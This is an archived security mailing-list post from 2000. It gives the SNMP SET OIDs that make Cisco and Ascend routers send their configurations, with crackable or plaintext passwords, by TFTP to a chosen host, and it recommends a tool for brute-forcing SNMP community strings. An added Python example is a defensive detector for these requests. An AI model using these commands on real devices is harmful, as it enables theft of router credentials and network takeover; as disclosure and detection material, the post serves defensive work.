The OpenNET Project
 


cisco/ascend snmp config tool or exploit? -- snmp problems still alive


Date: Fri, 18 Feb 2000 01:17:52 -0600
From: monti <monti@USHOST.COM.>
To: [email protected]
Subject: cisco/ascend snmp config tool or exploit? -- Re: snmp problems still alive



Disclaimer: The attached utility is based on widely known public
information and its functionality is replicated in many very expensive
commercial products. This information is provided for educational purposes
only. I am not responsible for misuse of this tool or information.

May this script help make SNMP die the sad lonely death it deserves once
and for all!

On that note... I originally cobbled this together to keep the network
admins I worked with from doing annoying things like keeping tftp daemons
running on my Unix hosts for weeks on end. It's pretty handy for that too.

It's just a lame little script to automate snmp/tftp config dumps from
ciscos and ascends using snmp/tftp with a temporary tftp server. I
thought it might be of interest (to some) while we're on the subject
(again) of snmp router config downloads. I've seen several home-grown
versions of this for ciscos out there, a handful for ascends, but have not
run across any that do both, so...

The OIDs to accomplish this on ciscos and ascends are below. Basically in
both cases doing an SNMP set on certain variables will trigger the tftp
config upload from the target router.

'XXX' denotes IP address octets for where you want the config to go.

Cisco:
SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename"

Ascend:
SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX
SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename"


As everybody knows, Cisco type 7 hashes are trivial, and ascends keep
passwords unencrypted, so this tool or one of the zillion others like it
(HP Openview anybody?) could be used by crazed frothy-mouthed sociopaths
to dish out truckloads of evil upon meek internet-shoppers!!!@!@#$!!!

As others already have mentioned, it's worse too since you could just
replace a config if you're in the mood. The OIDs to accomplish that can
be found in the respective cisco and ascend MIBs nearby the ones outlined
above. I didn't put these in my script for fairly obvious reasons given
its original intended users ;)


-Eric Monti

--BTW. 9 out of 10 'forgetful admins' recommend the use of ADMsnmp for
brute-forcing communities!

On Tue, 15 Feb 2000, Gus Huber wrote:

> It should be noted in this discussion that MANY of these devices also
> through SNMP queries can be completely compromised by either sending or
> receiving configuration files from arbitrary locations.  Both cisco and
> ascend products support downloading and uploading of configuration files
> via tftp from an SNMP query.  From that point it is trivial to sniff
> network traffic.  AFAIK, ascend still ships with the SNMP communities set as
> public for read-only, and write for RW.  Also many hardware devices do not
> log queries sent to invalid SNMP communities in SNMPv1, so it is a simple
> game of brute force to get those communities.


[Attachment: grabrtrconf (TEXT/PLAIN, BASE64-encoded)]
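
Added example, not part of the original post or its attachment: a defender-side check that scans decoded SNMP records for SET requests on the Cisco and Ascend OIDs listed in the message and reports whether the TFTP destination is a sanctioned server. The record format, the function and variable names, the filenames and the addresses are assumptions constructed for illustration.

```python
import ipaddress

# OIDs as given in the post (leading dot stripped).
CISCO_UPLOAD = "1.3.6.1.4.1.9.2.1.55"    # instance suffix = TFTP host octets
ASCEND_HOST = "1.3.6.1.4.1.529.9.5.3.0"  # value = TFTP host address
ASCEND_FILE = "1.3.6.1.4.1.529.9.5.4.0"  # value = TFTP filename

def _ip(text):
    """Parse a dotted quad, returning None if it is not a valid address."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None

def find_config_uploads(lines, sanctioned_tftp):
    """Alert on each SET that starts an upload; line: time src dst pdu oid type value."""
    sanctioned = {ipaddress.ip_address(a) for a in sanctioned_tftp}
    ascend_host = {}  # (manager, router) -> TFTP host from an earlier SET
    alerts = []
    for line in lines:
        parts = line.split(None, 6)
        if len(parts) != 7 or parts[3].lower() != "set":
            continue
        when, src, dst, _pdu, oid, _type, value = parts
        oid, value = oid.lstrip("."), value.strip('"')
        if oid.startswith(CISCO_UPLOAD + "."):
            vendor, tftp = "cisco", _ip(oid[len(CISCO_UPLOAD) + 1:])
        elif oid == ASCEND_HOST:
            ascend_host[(src, dst)] = _ip(value)  # remember, alert on the file SET
            continue
        elif oid == ASCEND_FILE:
            vendor, tftp = "ascend", ascend_host.pop((src, dst), None)
        else:
            continue
        alerts.append({"time": when, "manager": src, "router": dst,
                       "vendor": vendor, "tftp": str(tftp) if tftp else None,
                       "file": value, "sanctioned": tftp in sanctioned})
    return alerts

# Constructed sample records (documentation addresses, not real traffic).
SAMPLE = [
    "2000-02-18T01:00:00 192.0.2.10 192.0.2.1 get .1.3.6.1.2.1.1.1.0 - -",
    '2000-02-18T01:00:05 192.0.2.10 192.0.2.1 set .1.3.6.1.4.1.9.2.1.55.192.0.2.10 s "rtr1-confg"',
    "2000-02-18T01:02:00 198.51.100.7 192.0.2.2 set .1.3.6.1.4.1.529.9.5.3.0 a 198.51.100.7",
    '2000-02-18T01:02:01 198.51.100.7 192.0.2.2 set .1.3.6.1.4.1.529.9.5.4.0 s "max.cfg"',
]

if __name__ == "__main__":
    for alert in find_config_uploads(SAMPLE, ["192.0.2.10"]):
        print(alert)
```

An alert with "sanctioned" set to False means the router was told to send its config to a host outside the approved TFTP list, or that the destination could not be determined from the records.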

